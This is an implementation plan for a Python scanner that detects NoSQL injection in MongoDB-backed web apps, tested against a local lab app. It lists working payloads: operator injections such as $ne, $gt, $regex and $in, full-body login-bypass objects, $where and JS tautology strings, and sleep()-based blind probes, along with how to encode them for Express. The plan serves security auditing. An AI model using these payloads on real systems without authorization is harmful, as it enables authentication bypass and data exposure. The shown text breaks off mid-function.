NoSQL Injection CLI Scanner — Implementation Plan

Document Control

Field | Value
Project | NoSQL Injection CLI Scanner
Artifact | Implementation Plan v1.0
Runtime | Python 3.10+ (CPython), Windows / Linux / macOS
Stack | argparse, requests, beautifulsoup4, rich, urllib3
Target App | Custom Express/MongoDB app at website/ (localhost:3000)
Version | 1.0 Planning Baseline
Date | 2026-04-22

1. Vision and Outcome

We are building a Python CLI vulnerability scanner that automatically detects NoSQL injection flaws in MongoDB-backed web applications. The tool crawls a target website, discovers forms and API inputs, injects categorized NoSQL payloads (operator injection, regex extraction, logic bypasses) using both URL-encoded and JSON content types, and analyzes server responses to flag authentication bypasses, data leaks, and abnormal behaviors. This matters because MongoDB/Node.js stacks are widely deployed yet under-tested for injection flaws. The tool gives security researchers and developers a repeatable, automated way to audit their applications without manual curl testing.

User Flow

  1. Invoke — User runs python scanner.py --url http://localhost:3000 --max-depth 2 --output report.json --verbose from the cli/ directory.
  2. Validate — Scanner validates the URL, confirms the target is reachable, and establishes a baseline response fingerprint.
  3. Crawl — Scanner crawls internal pages within scope (up to --max-depth), collecting all discoverable HTML forms and their field structures.
  4. Inject — For each discovered form, payloads from payloads.json are injected into each field. Each payload is tested as both application/x-www-form-urlencoded and application/json where applicable.
  5. Analyze — Response analysis engine compares each response against the baseline, checking for status code changes, body content anomalies (e.g., "ok": true where "ok": false was expected), redirect behavior changes, and timing anomalies.
  6. Report — Scanner writes a structured JSON report and prints a colorized console summary with severity-scored findings.

2. Scope

In Scope (V1)

  • CLI argument parsing with argparse (--url, --max-depth, --timeout, --output, --verbose, --content-type, --delay)
  • URL validation and normalization (scheme enforcement, trailing-slash normalization)
  • Recursive page crawler with scope restriction (same-origin only) and configurable depth limit
  • HTML form discovery via BeautifulSoup — extracting action, method, input name/type attributes
  • Curated payloads.json with categorized vectors:
    • Operator injection: $ne, $gt, $regex, $in, $nin, $exists
    • Logic bypass: ' || 1==1, $where clauses
    • Time-based blind: sleep() payloads for timing side-channel detection
    • Derived from nosqli_wordlist.txt and the NoSQL Injection reference guide
  • Dual content-type testing: each payload submitted as both application/x-www-form-urlencoded and application/json
  • Response analysis heuristics:
    • Status code delta — 401 → 200 indicates bypass
    • Body content matching ("ok": true, "Login successful", "count": changes)
    • Redirect detection — 3xx or client-side redirect indicators
    • Timing analysis — response time > baseline + threshold indicates blind injection
    • Error signature detection — MongoDB/Mongoose error strings in response body
  • Severity scoring: Critical / High / Medium / Low / Info
  • Structured JSON report matching the contract in README.md
  • Colorized console summary via rich
  • Session-aware scanning (cookie jar persistence across requests to handle authenticated flows)
  • Logging with Python logging module at configurable verbosity levels
  • Robust error handling: timeouts, connection errors, malformed HTML, unreachable targets

Out of Scope (V1)

  • Automated data exploitation/dumping — the scanner detects and proves, but does not extract database contents beyond proof-of-concept confirmation
  • Server-Side JavaScript Injection (SSJI) evaluation: $where payloads are included for detection, but arbitrary JS execution chains are not evaluated
  • GUI/Web interface — CLI only
  • Non-MongoDB databases — no CouchDB, Cassandra, or Redis-specific payloads
  • Proxy/interceptor integration — no Burp Suite or ZAP plugin mode
  • Distributed/multi-threaded scanning — single-threaded sequential scanning for V1
  • Custom authentication flows — scanner supports cookie-based sessions; OAuth/JWT/SAML are deferred

3. Quality Bar and Success Criteria

Functional Success

  • Scanner correctly identifies the known auth bypass on POST /api/vuln/login when injecting {"username": {"$gt": ""}, "password": {"$gt": ""}} — rated Critical/High
  • Scanner correctly identifies search injection on GET/POST /api/vuln/search when injecting operator objects — rated High/Medium
  • Scanner produces zero false positives when run against POST /api/secure/login and GET /api/secure/search (secure mode rejects all operator payloads with 400)
  • Scanner discovers at least the login form on /login.html and search form on /search.html via crawling
  • JSON report output validates against the report contract defined in README.md

Security Success

  • Scanner never stores or leaks target credentials beyond the scan session
  • All payloads are loaded from the external payloads.json file — no hardcoded attack strings in source
  • Scanner includes a mandatory --i-agree-to-legal-terms flag or disclaimer prompt before scanning non-localhost targets
  • No dependency with known CVEs at time of release

Performance Success

  • Full scan of the target app (2 pages, ~30 payloads × 2 content types × 2 forms) completes in under 60 seconds with default timeout (5s per request)
  • Individual request timeout default: 5 seconds
  • Memory usage under 100MB for any scan

Operability Success

  • pip install -r requirements.txt from a clean venv succeeds on Python 3.10+
  • python scanner.py --help prints complete usage documentation
  • Scanner exits with code 0 on success, 1 on scan errors, 2 on argument errors

UX/DX Success

  • Console output uses color-coded severity levels (red=Critical, orange=High, yellow=Medium, cyan=Low)
  • Progress indicators show current phase (Crawling → Injecting → Analyzing → Reporting)
  • Verbose mode logs every request/response pair for lab analysis and debugging

4. Target Architecture

4.1 Core Components

1. CLI Entry Point (scanner.py) The main entry point. Parses arguments via argparse, orchestrates the scan pipeline (validate → crawl → inject → analyze → report), and handles top-level error boundaries. Owns the decision of which phases to run and in what order.

2. URL Validator (core/validator.py) Validates and normalizes the target URL. Ensures scheme is http/https, resolves trailing slashes, and performs a reachability check (HEAD request) before the scan begins. Returns a canonical base URL for the crawler.

3. Web Crawler (core/crawler.py) Recursively discovers pages within the target's origin up to --max-depth. Maintains a visited-URL set to avoid cycles. For each discovered page, delegates to the form parser. Uses requests.Session for cookie persistence. Respects robots.txt as a courtesy (configurable).

4. Form Parser (core/form_parser.py) Uses BeautifulSoup to extract all <form> elements from a page. For each form, captures: action URL (resolved to absolute), HTTP method, input field names and types, and any hidden fields. Returns structured FormTarget objects for the injection engine.

5. Payload Manager (core/payloads.py) Loads and categorizes payloads from payloads.json. Exposes payloads grouped by category (operator_injection, logic_bypass, regex_extraction, time_based, blind_bruteforce, auth_bypass_combo). Each payload entry includes: the payload value, a category tag, expected behavior description, and applicable content types.

6. Injection Engine (core/injector.py) Takes a FormTarget and a list of payloads. For each injectable field, substitutes the payload and submits the form. Tests each payload under both application/x-www-form-urlencoded and application/json content types. Records the full request/response pair for analysis. Supports configurable inter-request delay.

7. Response Analyzer (core/analyzer.py) Compares each injection response against a baseline response (captured by submitting the form with benign data). Implements heuristic checks: status code delta, body content keyword matching, response length delta, redirect detection, timing anomaly detection (for time-based blind), and MongoDB error string scanning. Assigns a severity and confidence score to each finding.

8. Report Generator (core/reporter.py) Collects all findings from the analyzer and produces: (a) a structured JSON report file matching the contract in README.md, and (b) a colorized console summary table using rich. Includes scan metadata (target, start/end time, total forms/payloads tested, findings count by severity).

9. Utilities (core/utils.py) Shared helpers: logging configuration, URL resolution, timing utilities, constant definitions (e.g., known MongoDB error signatures), and the disclaimer/legal prompt.

4.2 Proposed Folder/Module Structure

cli/
├── scanner.py                  # Entry point — CLI argument parsing and pipeline orchestration
├── requirements.txt            # Python dependencies
├── payloads.json               # Categorized NoSQL injection payloads
├── core/
│   ├── __init__.py
│   ├── validator.py            # URL validation and reachability check
│   ├── crawler.py              # Recursive same-origin page crawler
│   ├── form_parser.py          # BeautifulSoup-based HTML form extractor
│   ├── payloads.py             # Payload loader and category manager
│   ├── injector.py             # Form submission engine (URL-encoded + JSON)
│   ├── analyzer.py             # Response comparison and heuristic scoring
│   ├── reporter.py             # JSON report writer + Rich console summary
│   ├── utils.py                # Shared helpers, constants, logging setup
│   └── models.py               # Data classes: FormTarget, Finding, ScanResult, Payload
├── references/
│   ├── NoSQL Injection.md      # Reference guide (existing)
│   └── nosqli_wordlist.txt     # Raw wordlist (existing)
├── general plan.md             # Plan template (existing)
└── README.md                   # Usage documentation (existing)

5. Phase Plan

Phase 0 — Requirements and Risk Baseline

Goals: Confirm all requirements, validate the vulnerable target app is functional, and establish the development environment.

Work Packages:

  1. Verify Python 3.10+ is installed and create the virtual environment (python -m venv .venv)
  2. Populate requirements.txt with pinned versions: requests==2.32.*, beautifulsoup4==4.12.*, rich==13.*, urllib3==2.*
  3. Start the target website (cd website && npm install && node src/server.js) and confirm it responds on http://localhost:3000
  4. Manually verify the vulnerable endpoints still behave as documented in MODE_AUTH_FLOW_TEST_RESULTS.md:
    • POST /api/vuln/login with username[$ne]=&password[$ne]= → 200 + "ok": true
    • POST /api/vuln/login with legit creds → 200 + "ok": true
    • POST /api/vuln/login with wrong creds → 401 + "ok": false
    • POST /api/secure/login with password[$ne]= → 400 + "must be non-empty strings"
  5. Create the cli/core/ package directory with __init__.py
  6. Confirm payloads.json can be loaded and parsed (currently {}, will be populated in Phase 1)

Deliverables:

  • Working venv with all dependencies installed
  • Confirmed target app responses matching expected behavior
  • Empty cli/core/ package structure created

Exit Criteria:

  • pip install -r requirements.txt succeeds
  • Target app responds correctly to both legit and injection payloads
  • All team members have the same environment running

References: R1, R2, R3


Phase 1 — Foundation: Models, Payloads, and Utilities

Goals: Build the data layer and shared infrastructure that all other components depend on.

Work Packages:

  1. Create core/models.py — Define the following dataclasses:

    from dataclasses import dataclass
    from typing import Any

    @dataclass
    class FormTarget:
        url: str              # Absolute action URL
        method: str           # GET or POST
        fields: list[dict]    # [{"name": "username", "type": "text"}, ...]
        page_url: str         # Page where the form was found
    
    @dataclass
    class Payload:
        value: Any            # The payload (string, dict, or list)
        category: str         # operator_injection | regex_extraction | logic_bypass | time_based | blind_bruteforce | auth_bypass_combo
        description: str      # Human-readable explanation
        content_types: list   # ["urlencoded", "json"] or subset
    
    @dataclass
    class Finding:
        severity: str         # critical | high | medium | low | info
        confidence: str       # confirmed | tentative | speculative
        endpoint: str         # e.g., /api/vuln/login
        form_page: str        # e.g., /login.html
        method: str           # POST, GET
        content_type: str     # The content type that triggered the finding
        payload: Any          # The exact payload that triggered it
        payload_category: str # Category from Payload
        evidence: str         # Human-readable evidence description
        baseline_status: int  # Expected status code
        actual_status: int    # Observed status code
        response_snippet: str # First 500 chars of response body
        response_time_ms: float
    
    @dataclass
    class ScanResult:
        target: str
        scan_start: str       # ISO 8601
        scan_end: str         # ISO 8601
        pages_crawled: int
        forms_discovered: int
        payloads_tested: int
        findings: list[Finding]
  2. Create core/utils.py — Implement:

    • setup_logging(verbose: bool) -> logging.Logger — configures root logger with Rich handler
    • resolve_url(base: str, relative: str) -> str — uses urllib.parse.urljoin
    • MONGODB_ERROR_SIGNATURES: list[str] = ["MongoError", "MongoServerError", "CastError", "ValidationError", "BSONTypeError", "$where", "mapReduce"]
    • SUCCESS_INDICATORS: list[str] = ['"ok": true', '"ok":true', '"Login successful"', '"message": "Login successful"']
    • FAILURE_INDICATORS: list[str] = ['"ok": false', '"ok":false', '"Invalid credentials"']
    • print_banner() — prints ASCII art tool name and version
  3. Populate payloads.json — Curate payloads derived from nosqli_wordlist.txt and NoSQL Injection.md. Structure:

    {
      "operator_injection": [
        {
          "value": {"$ne": ""},
          "description": "Not-equal empty string bypass",
          "content_types": ["urlencoded", "json"]
        },
        {
          "value": {"$gt": ""},
          "description": "Greater-than empty string bypass",
          "content_types": ["urlencoded", "json"]
        },
        {
          "value": {"$ne": null},
          "description": "Not-equal null bypass",
          "content_types": ["json"]
        },
        {
          "value": {"$regex": ".*"},
          "description": "Wildcard regex match-all",
          "content_types": ["json"]
        },
        {
          "value": {"$regex": "^a"},
          "description": "Regex prefix extraction probe (letter a)",
          "content_types": ["json"]
        },
        {
          "value": {"$exists": true},
          "description": "Field existence check bypass",
          "content_types": ["json"]
        },
        {
          "value": {"$in": ["admin", "root", "administrator", "Admin"]},
          "description": "In-list common username brute force",
          "content_types": ["json"]
        },
        {
          "value": {"$nin": ["impossible_value_12345"]},
          "description": "Not-in exclusion bypass",
          "content_types": ["json"]
        }
      ],
      "logic_bypass": [
        {
          "value": "' || 1==1",
          "description": "JS logical OR tautology",
          "content_types": ["urlencoded"]
        },
        {
          "value": "' || 1==1//",
          "description": "JS logical OR tautology with comment",
          "content_types": ["urlencoded"]
        },
        {
          "value": "' || 1==1%00",
          "description": "JS logical OR with null byte terminator",
          "content_types": ["urlencoded"]
        },
        {
          "value": "true, $where: '1 == 1'",
          "description": "$where clause injection via string concatenation",
          "content_types": ["urlencoded"]
        },
        {
          "value": ", $where: '1 == 1'",
          "description": "$where clause injection (comma prefix)",
          "content_types": ["urlencoded"]
        }
      ],
      "regex_extraction": [
        {
          "value": {"$regex": "^admin"},
          "description": "Regex probe — starts with admin",
          "content_types": ["json"]
        },
        {
          "value": {"$regex": "^.{1,50}$"},
          "description": "Regex probe — match strings 1-50 chars",
          "content_types": ["json"]
        }
      ],
      "time_based": [
        {
          "value": {"$where": "sleep(3000)"},
          "description": "Time-based blind — 3 second sleep",
          "content_types": ["json"],
          "expected_delay_ms": 3000
        },
        {
          "value": "';sleep(3000);",
          "description": "JS injection sleep via string break",
          "content_types": ["urlencoded"],
          "expected_delay_ms": 3000
        }
      ],
      "auth_bypass_combo": [
        {
          "value": {"username": {"$gt": ""}, "password": {"$gt": ""}},
          "description": "Full auth bypass — both fields gt empty",
          "content_types": ["json"],
          "is_full_body": true
        },
        {
          "value": {"username": {"$ne": null}, "password": {"$ne": null}},
          "description": "Full auth bypass — both fields ne null",
          "content_types": ["json"],
          "is_full_body": true
        },
        {
          "value": {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}},
          "description": "Full auth bypass — both fields ne arbitrary",
          "content_types": ["json"],
          "is_full_body": true
        },
        {
          "value": {"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$gt": ""}},
          "description": "Admin brute force via $in + $gt bypass",
          "content_types": ["json"],
          "is_full_body": true
        }
      ]
    }
  4. Create core/payloads.py — Implement:

    • load_payloads(filepath: str) -> dict[str, list[Payload]] — loads and validates payloads.json, returns categorized Payload objects
    • get_all_payloads(categories: dict) -> list[Payload] — flattens all categories into a single list
    • get_payloads_for_content_type(payloads: list[Payload], content_type: str) -> list[Payload] — filters payloads by content type
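The loader and filter functions listed in work package 4 could look roughly like the sketch below. It is a minimal illustration, not the project's implementation. `parse_payloads` is a hypothetical helper introduced here so the conversion can be exercised without touching a file, and the `Payload` dataclass is repeated only to keep the block self-contained. Extra keys such as `expected_delay_ms` and `is_full_body` are ignored because the `Payload` dataclass defined earlier has no fields for them.

```python
import json
from dataclasses import dataclass, field
from typing import Any


@dataclass
class Payload:
    value: Any
    category: str
    description: str
    content_types: list[str] = field(default_factory=list)


def parse_payloads(raw: dict[str, list[dict]]) -> dict[str, list[Payload]]:
    """Hypothetical helper: turn the decoded payloads.json mapping into Payload objects."""
    categorized: dict[str, list[Payload]] = {}
    for category, entries in raw.items():
        if not isinstance(entries, list):
            raise ValueError(f"category {category!r} must map to a list of entries")
        items = []
        for entry in entries:
            if "value" not in entry:
                raise ValueError(f"payload in {category!r} is missing 'value'")
            items.append(
                Payload(
                    value=entry["value"],
                    category=category,  # category comes from the enclosing JSON key
                    description=entry.get("description", ""),
                    content_types=list(entry.get("content_types", [])),
                )
            )
        categorized[category] = items
    return categorized


def load_payloads(filepath: str) -> dict[str, list[Payload]]:
    """Read payloads.json from disk and return categorized Payload objects."""
    with open(filepath, encoding="utf-8") as handle:
        return parse_payloads(json.load(handle))


def get_all_payloads(categories: dict[str, list[Payload]]) -> list[Payload]:
    """Flatten every category into one list, preserving category order."""
    return [payload for items in categories.values() for payload in items]


def get_payloads_for_content_type(payloads: list[Payload], content_type: str) -> list[Payload]:
    """Keep only payloads that declare support for the given content type."""
    return [p for p in payloads if content_type in p.content_types]
```

Deriving `category` from the enclosing key avoids repeating the tag inside every entry, which matches the payloads.json structure shown above.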

Deliverables:

  • core/models.py with all dataclasses
  • core/utils.py with logging, URL helpers, and constants
  • core/payloads.py with loader and filter functions
  • Populated payloads.json with 20+ categorized payloads

Exit Criteria:

  • from core.models import FormTarget, Payload, Finding, ScanResult works
  • load_payloads("payloads.json") returns populated payload categories
  • All constants are centrally defined and importable

References: R1, R2, R3


Phase 2 — URL Validation and Web Crawler

Goals: Implement the input validation layer and recursive page crawler that discovers all forms within the target scope.

Work Packages:

  1. Create core/validator.py — Implement:

    • validate_url(url: str) -> str — checks scheme is http/https, normalizes trailing slash, validates hostname format. Raises ValueError on invalid input.
    • check_reachability(url: str, timeout: int) -> tuple[bool, int, float] — sends HEAD request, returns (reachable, status_code, response_time_ms). Handles ConnectionError, Timeout, TooManyRedirects.
    • get_base_origin(url: str) -> str — extracts scheme://host:port for scope comparison.
  2. Create core/crawler.py — Implement:

    • Crawler class with:
      • __init__(self, base_url: str, max_depth: int, timeout: int, session: requests.Session)
      • crawl(self) -> list[CrawledPage] — BFS/DFS traversal starting from base_url
      • _fetch_page(self, url: str) -> str | None — GET request, return HTML body or None on error
      • _extract_links(self, html: str, page_url: str) -> list[str] — find all <a href> links, resolve to absolute, filter to same origin
      • _is_in_scope(self, url: str) -> bool — checks if URL shares the same origin as base
    • CrawledPage dataclass: url: str, html: str, depth: int
    • Visited-URL deduplication via set
    • Skip non-HTML resources (check Content-Type header before parsing)
    • Log each discovered page at INFO level
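The validation and scope rules in this phase can be sketched with the standard library alone. This is a rough illustration under stated assumptions: the plan does not say which trailing-slash policy to use, so the sketch strips trailing slashes, and it fills in default ports so that `http://host` and `http://host:80` compare as the same origin. `is_in_scope` is written as a free function standing in for `Crawler._is_in_scope`.

```python
from urllib.parse import urlsplit, urlunsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def validate_url(url: str) -> str:
    """Return a normalized URL or raise ValueError for unusable input."""
    parts = urlsplit(url.strip())
    if parts.scheme not in DEFAULT_PORTS:
        raise ValueError(f"unsupported or missing scheme: {url!r}")
    if not parts.hostname:
        raise ValueError(f"missing hostname: {url!r}")
    # Assumed policy: drop trailing slashes so equivalent URLs compare equal.
    path = parts.path.rstrip("/")
    return urlunsplit((parts.scheme, parts.netloc, path, parts.query, ""))


def get_base_origin(url: str) -> str:
    """Extract scheme://host:port, filling in the default port when omitted."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    return f"{parts.scheme}://{parts.hostname}:{port}"


def is_in_scope(url: str, base_url: str) -> bool:
    """Same-origin check used to keep the crawler on the target."""
    return get_base_origin(url) == get_base_origin(base_url)
```

For example, `validate_url("http://localhost:3000/")` yields `http://localhost:3000`, while `validate_url("not-a-url")` raises `ValueError` because no http/https scheme is present.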

Deliverables:

  • core/validator.py — URL validation and reachability
  • core/crawler.py — recursive crawler with scope enforcement

Exit Criteria:

  • validate_url("http://localhost:3000") returns normalized URL
  • validate_url("not-a-url") raises ValueError
  • Crawler("http://localhost:3000", max_depth=2, ...).crawl() discovers at least /, /login.html, /search.html
  • Crawler does not visit external links or non-HTML resources

References: R1, R4


Phase 3 — Form Discovery and Parsing

Goals: Extract all injectable form targets from crawled pages.

Work Packages:

  1. Create core/form_parser.py — Implement:

    • parse_forms(html: str, page_url: str) -> list[FormTarget] — uses BeautifulSoup to find all <form> tags
    • For each form, extract:
      • action attribute → resolve to absolute URL using page_url as base
      • method attribute → default to GET if missing, normalize to uppercase
      • All <input>, <textarea>, <select> elements → capture name, type, value (default value if present)
      • Hidden fields are preserved (they may contain CSRF tokens or mode selectors)
    • Return list of FormTarget objects
    • Handle edge cases: forms with no action (submit to current page), forms with empty method, nested forms (invalid HTML but handle gracefully)
  2. Integration test: Run crawler → form parser pipeline against http://localhost:3000 and verify:

    • Login form discovered with fields: username (text), password (password), send-json (checkbox)
    • Search form discovered with fields: query (text), send-json (checkbox)
    • Action URLs resolve correctly (/api/vuln/login, /api/vuln/search or relative)
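The extraction rules above (default method GET, action resolved against the page URL, named inputs captured) can be sketched as follows. Note the swap: this sketch uses the standard library `html.parser` in place of BeautifulSoup, purely so the example runs without third-party packages. The plan's actual parser is expected to use BeautifulSoup. `FormTarget` is repeated in simplified form, and `_FormCollector` is a hypothetical name.

```python
from dataclasses import dataclass, field
from html.parser import HTMLParser
from urllib.parse import urljoin


@dataclass
class FormTarget:
    url: str
    method: str
    fields: list[dict] = field(default_factory=list)
    page_url: str = ""


class _FormCollector(HTMLParser):
    """Collects <form> elements and the named controls inside them."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None  # form currently being read, if any

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "form":
            # A missing or empty action means "submit to the current page".
            action = attr.get("action") or ""
            method = (attr.get("method") or "GET").upper()
            self._current = FormTarget(
                url=urljoin(self.page_url, action),
                method=method,
                page_url=self.page_url,
            )
            self.forms.append(self._current)
        elif tag in ("input", "textarea", "select") and self._current is not None:
            name = attr.get("name")
            if name:  # unnamed controls are never submitted
                default_type = "text" if tag == "input" else tag
                self._current.fields.append({
                    "name": name,
                    "type": attr.get("type") or default_type,
                    "value": attr.get("value") or "",
                })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def parse_forms(html: str, page_url: str) -> list[FormTarget]:
    collector = _FormCollector(page_url)
    collector.feed(html)
    collector.close()
    return collector.forms
```

A nested `<form>` simply starts a new target in this sketch, which is one tolerant way to handle that invalid markup.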

Important

The login and search forms in the target app submit via JavaScript (login.js, search.js), not via standard HTML form actions. The <form> tags may have no action attribute, or the action may not match the actual API endpoint. The form parser should extract whatever the HTML provides, but the injection engine (Phase 4) must either accept a manual endpoint override via the --endpoints CLI flag or fall back to inferring API paths from the fetch/XHR URLs in the JS files.
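One way to approach the JS-based endpoint inference mentioned in this note is a simple regular-expression pass over the script source. The sketch below is an assumption about how that fallback might work, not a description of the target app's scripts. `infer_endpoints` is a hypothetical name, and the patterns only catch string-literal URLs passed directly to `fetch(...)` or `XMLHttpRequest.open(...)`.

```python
import re
from urllib.parse import urljoin

# fetch("/path", ...) with a single-, double-, or backtick-quoted literal URL.
_FETCH_URL = re.compile(r"""fetch\(\s*(['"`])(?P<url>[^'"`]+)\1""")
# xhr.open("METHOD", "/path") where the second argument is a literal URL.
_XHR_OPEN = re.compile(
    r"""\.open\(\s*(['"])[A-Za-z]+\1\s*,\s*(['"`])(?P<url>[^'"`]+)\2"""
)


def infer_endpoints(js_source: str, page_url: str) -> list[str]:
    """Return absolute URLs found in fetch/XHR calls, in first-seen order."""
    found = []
    for pattern in (_FETCH_URL, _XHR_OPEN):
        for match in pattern.finditer(js_source):
            absolute = urljoin(page_url, match.group("url"))
            if absolute not in found:
                found.append(absolute)
    return found
```

URLs assembled from variables or template expressions are not resolved by this approach, which is why the manual `--endpoints` override remains necessary.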

Deliverables:

  • core/form_parser.py — BeautifulSoup-based form extractor
  • Verified form discovery against the live target

Exit Criteria:

  • parse_forms(html, "http://localhost:3000/login.html") returns at least one FormTarget with username and password fields
  • All form field names are correctly captured
  • Absolute action URLs are correctly resolved

References: R1, R4


Phase 4 — Injection Engine

Goals: Build the core scanning engine that submits payloads to discovered forms and records responses.

Work Packages:

  1. Create core/injector.py — Implement:

    • Injector class with:
      • __init__(self, session: requests.Session, timeout: int, delay: float, verbose: bool)
      • establish_baseline(self, form: FormTarget) -> BaselineResponse — submit the form with benign data (empty strings or placeholder values) to capture the "normal" response (status code, body length, key content markers, response time)
      • inject_form(self, form: FormTarget, payloads: list[Payload]) -> list[InjectionResult] — for each payload:
        1. For each injectable field (skip checkboxes, hidden fields with fixed values)
        2. For each applicable content type (urlencoded, json):
          • Build the request body with the payload substituted into the current field, benign values in other fields
          • For is_full_body payloads (auth_bypass_combo), use the payload as the entire request body
          • Submit and record: status code, response body, response headers, response time, any cookies set
          • Apply inter-request delay if configured
      • _build_urlencoded_body(self, form: FormTarget, field_name: str, payload_value) -> dict — for operator payloads like {"$ne": ""}, encode as field_name[$ne]=
      • _build_json_body(self, form: FormTarget, field_name: str, payload_value) -> dict — substitute payload object directly into JSON body
    • BaselineResponse dataclass: status_code, body_length, body_hash, response_time_ms, key_markers (list of found SUCCESS/FAILURE indicators)
    • InjectionResult dataclass: form, field_name, payload, content_type, status_code, body, headers, response_time_ms, cookies
  2. URL-encoded operator encoding logic: When sending operator injection payloads via urlencoded content type, the injector must format them correctly for Express's qs parser:

    • {"$ne": ""} → field_name[$ne]=
    • {"$gt": ""} → field_name[$gt]=
    • {"$regex": ".*"} → field_name[$regex]=.*
    • {"$in": ["admin", "root"]} → field_name[$in][]=admin&field_name[$in][]=root
  3. Session cookie management: The injector must use a shared requests.Session so that if a payload achieves login (sets a session cookie), subsequent requests to authenticated endpoints (like /api/vuln/search) can be tested in the authenticated context. The injector should also support resetting the session between payload groups to avoid cross-contamination (logout + new session).
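The bracket-notation mapping described in work package 2 can be sketched as a small recursive flattener, shown next to a JSON body builder for comparison. This is a minimal sketch: `encode_operator_pairs`, `to_urlencoded`, and `build_json_body` are hypothetical names, the benign filler value `"test"` is an assumption, and `None` is sent as an empty string because a URL-encoded body cannot carry a JSON null.

```python
from typing import Any
from urllib.parse import urlencode


def _scalar(value: Any) -> str:
    """Render a leaf value as the string sent on the wire."""
    if value is None:
        return ""
    if isinstance(value, bool):
        return "true" if value else "false"
    return str(value)


def encode_operator_pairs(field_name: str, payload_value: Any) -> list[tuple[str, str]]:
    """Flatten a payload into (key, value) pairs using bracket notation."""
    if isinstance(payload_value, dict):
        pairs = []
        for operator, operand in payload_value.items():
            pairs.extend(encode_operator_pairs(f"{field_name}[{operator}]", operand))
        return pairs
    if isinstance(payload_value, list):
        pairs = []
        for item in payload_value:
            pairs.extend(encode_operator_pairs(f"{field_name}[]", item))
        return pairs
    return [(field_name, _scalar(payload_value))]


def to_urlencoded(field_name: str, payload_value: Any) -> str:
    """Build the body string, leaving brackets and '$' unescaped for readability."""
    return urlencode(encode_operator_pairs(field_name, payload_value), safe="[]$")


def build_json_body(field_names: list[str], target_field: str,
                    payload_value: Any, benign: str = "test") -> dict:
    """Benign filler in every field except the one under test."""
    body = {name: benign for name in field_names}
    body[target_field] = payload_value
    return body
```

With these helpers, `to_urlencoded("username", {"$ne": ""})` produces `username[$ne]=`, and `build_json_body(["username", "password"], "username", {"$gt": ""})` keeps the operator object intact for the JSON variant.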

Deliverables:

  • core/injector.py — injection engine with dual content-type support
  • Baseline capture and session management

Exit Criteria:

  • Injector correctly sends POST /api/vuln/login with {"username": {"$gt": ""}, "password": {"$gt": ""}} as JSON and receives 200
  • Injector correctly sends POST /api/vuln/login with username[$ne]=&password[$ne]= as urlencoded and receives 200
  • Injector correctly sends the same payloads to /api/secure/login and receives 400
  • Baseline response for login form correctly captures 401 status with "ok": false
  • Inter-request delay is respected

References: R1, R2, R3, R5


Phase 5 — Response Analysis and Severity Scoring

Goals: Implement the intelligence layer that determines whether an injection response indicates a vulnerability.

Work Packages:

  1. Create core/analyzer.py — Implement:

    • ResponseAnalyzer class with:
      • __init__(self, baseline: BaselineResponse, time_threshold_ms: float = 2500)
      • analyze(self, result: InjectionResult) -> Finding | None — runs all heuristic checks and returns a Finding if any trigger, or None if benign
      • _check_status_code_delta(self, result) -> tuple[bool, str] — returns True if status changed from failure (4xx) to success (2xx/3xx). Evidence: "Status changed from {baseline} to {actual}"
      • _check_auth_bypass(self, result) -> tuple[bool, str] — searches response body for SUCCESS_INDICATORS when baseline contained FAILURE_INDICATORS. Evidence: "Auth bypass detected: response contains 'Login successful'"
      • _check_data_leak(self, result) -> tuple[bool, str] — checks if response body contains significantly more data than baseline (body length ratio > 1.5x, or new JSON keys like "results", "count" appear). Evidence: "Data leak: response body {X}x larger than baseline"
      • _check_error_signature(self, result) -> tuple[bool, str] — scans response body for MONGODB_ERROR_SIGNATURES. Evidence: "MongoDB error exposed: {matched_signature}"
      • _check_timing_anomaly(self, result) -> tuple[bool, str] — if payload is time_based category and response_time > baseline + expected_delay * 0.8, flag. Evidence: "Time-based blind: response took {X}ms (baseline: {Y}ms)"
      • _check_redirect_change(self, result) -> tuple[bool, str] — if baseline had no redirect but injection response has 3xx or Location header. Evidence: "Unexpected redirect to {location}"
  2. Severity scoring logic:

    Condition | Severity | Confidence
    Auth bypass confirmed (status 401→200 + success indicator in body) | critical | confirmed
    Auth bypass partial (status change but no success indicator) | high | tentative
    Data leak detected (significant body length increase) | high | confirmed
    MongoDB error exposed | medium | confirmed
    Time-based blind (timing confirms) | high | tentative
    Redirect change observed | medium | speculative
    Status code change only (no other indicators) | low | speculative
  3. Finding deduplication: If the same endpoint+field combination triggers on multiple similar payloads (e.g., $ne and $gt both bypass login), keep the finding with the highest severity/confidence and note the others as corroborating evidence.
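The scoring table and the deduplication rule can be expressed as data plus two small functions. The sketch below rests on one interpretation that the plan does not spell out: "auth bypass partial" is taken to mean a failure-to-success status change (`auth_status_delta`), while "status code change only" covers any other status difference (`status_changed`). The check names, `ScoredFinding`, and its `corroborating` list are hypothetical simplifications of the `Finding` dataclass.

```python
from dataclasses import dataclass, field
from typing import Optional

SEVERITY_RANK = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}
CONFIDENCE_RANK = {"speculative": 0, "tentative": 1, "confirmed": 2}

# (checks that must all have triggered, severity, confidence)
RULES = [
    ({"auth_status_delta", "success_indicator"}, "critical", "confirmed"),
    ({"auth_status_delta"}, "high", "tentative"),
    ({"data_leak"}, "high", "confirmed"),
    ({"timing"}, "high", "tentative"),
    ({"error_signature"}, "medium", "confirmed"),
    ({"redirect"}, "medium", "speculative"),
    ({"status_changed"}, "low", "speculative"),
]


def _rank(severity: str, confidence: str) -> tuple[int, int]:
    return (SEVERITY_RANK[severity], CONFIDENCE_RANK[confidence])


def score(triggered: set[str]) -> Optional[tuple[str, str]]:
    """Return the strongest (severity, confidence) whose rule is satisfied."""
    matches = [(sev, conf) for required, sev, conf in RULES if required <= triggered]
    if not matches:
        return None
    return max(matches, key=lambda m: _rank(*m))


@dataclass
class ScoredFinding:
    endpoint: str
    field_name: str
    payload: str
    severity: str
    confidence: str
    corroborating: list[str] = field(default_factory=list)


def deduplicate(findings: list[ScoredFinding]) -> list[ScoredFinding]:
    """Keep the strongest finding per endpoint+field; record the rest as evidence."""
    best: dict[tuple[str, str], ScoredFinding] = {}
    for finding in findings:
        key = (finding.endpoint, finding.field_name)
        current = best.get(key)
        if current is None:
            best[key] = finding
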